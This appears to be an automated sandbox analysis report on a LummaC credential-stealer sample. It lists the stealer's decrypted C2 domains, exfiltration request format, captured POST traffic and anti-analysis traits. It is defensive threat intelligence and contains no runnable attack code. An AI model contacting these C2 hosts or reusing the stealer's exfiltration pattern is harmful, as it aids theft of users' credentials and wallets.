Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RrHuyQ4GzG.exe

Overview

General Information

Sample name:RrHuyQ4GzG.exe
renamed because original name is a hash value
Original sample name:6ac50f7457396de4520f8220f46c7756.exe
Analysis ID:1429055
MD5:6ac50f7457396de4520f8220f46c7756
SHA1:4a1f490ceafdbefb97f52340d3a7b876eb7e3677
SHA256:d040b1cad2d958a927b1a5552e455a2de58c2379b65050a853f383df9836f5b5
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Entry point lies outside standard sections
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • RrHuyQ4GzG.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\RrHuyQ4GzG.exe" MD5: 6AC50F7457396DE4520F8220F46C7756)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "incredibleextedwj.shop"], "Build id": "jgGZsr--Kirien"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: RrHuyQ4GzG.exe PID: 7508JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: RrHuyQ4GzG.exe PID: 7508JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: RrHuyQ4GzG.exe PID: 7508JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0.2.RrHuyQ4GzG.exe.f60000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "incredibleextedwj.shop"], "Build id": "jgGZsr--Kirien"}
              Source: https://incredibleextedwj.shop/pVirustotal: Detection: 8%Perma Link
              Source: https://incredibleextedwj.shop/apiVirustotal: Detection: 10%Perma Link
              Source: RrHuyQ4GzG.exeVirustotal: Detection: 19%Perma Link
              Source: RrHuyQ4GzG.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: demonstationfukewko.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: liabilitynighstjsko.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: alcojoldwograpciw.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: incredibleextedwj.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: shortsvelventysjo.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: shatterbreathepsw.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: tolerateilusidjukl.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: productivelookewr.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: incredibleextedwj.shop
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString decryptor: jgGZsr--Kirien
              Source: RrHuyQ4GzG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: RrHuyQ4GzG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: Malware configuration extractorURLs: demonstationfukewko.shop
              Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
              Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
              Source: Malware configuration extractorURLs: incredibleextedwj.shop
              Source: Malware configuration extractorURLs: shortsvelventysjo.shop
              Source: Malware configuration extractorURLs: shatterbreathepsw.shop
              Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
              Source: Malware configuration extractorURLs: productivelookewr.shop
              Source: Malware configuration extractorURLs: incredibleextedwj.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8785Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20438Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5451Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1407Host: incredibleextedwj.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573241Host: incredibleextedwj.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownDNS traffic detected: queries for: incredibleextedwj.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: incredibleextedwj.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: RrHuyQ4GzG.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: RrHuyQ4GzG.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: RrHuyQ4GzG.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1733933548.0000000003C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716421679.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1803906769.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/$
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/J
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716495040.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/M
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716421679.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/api
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/apiu
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716421679.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incredibleextedwj.shop/p
              Source: RrHuyQ4GzG.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716714886.0000000003C9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716714886.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716714886.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1716788131.0000000003C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1735176171.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717334318.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1734881552.0000000003D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.106:443 -> 192.168.2.4:49739 version: TLS 1.2

              System Summary

              barindex
              Source: RrHuyQ4GzG.exeStatic PE information: section name: 0
              Source: RrHuyQ4GzG.exeStatic PE information: section name: 1
              Source: RrHuyQ4GzG.exeStatic PE information: section name: 2
              Source: RrHuyQ4GzG.exeStatic PE information: invalid certificate
              Source: RrHuyQ4GzG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RrHuyQ4GzG.exe, 00000000.00000003.1717019969.0000000003C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: RrHuyQ4GzG.exeVirustotal: Detection: 19%
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile read: C:\Users\user\Desktop\RrHuyQ4GzG.exeJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: RrHuyQ4GzG.exeStatic file information: File size 7656696 > 1048576
              Source: RrHuyQ4GzG.exeStatic PE information: Raw size of 2 is bigger than: 0x100000 < 0x744000
              Source: RrHuyQ4GzG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: 2
              Source: RrHuyQ4GzG.exeStatic PE information: section name: 0
              Source: RrHuyQ4GzG.exeStatic PE information: section name: 1
              Source: RrHuyQ4GzG.exeStatic PE information: section name: 2

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: A80005 value: E9 2B BA 44 76 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: 76ECBA30 value: E9 DA 45 BB 89 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: B80008 value: E9 8B 8E 39 76 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: 76F18E90 value: E9 80 71 C6 89 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: BA0005 value: E9 8B 4D 05 75 Jump to behavior
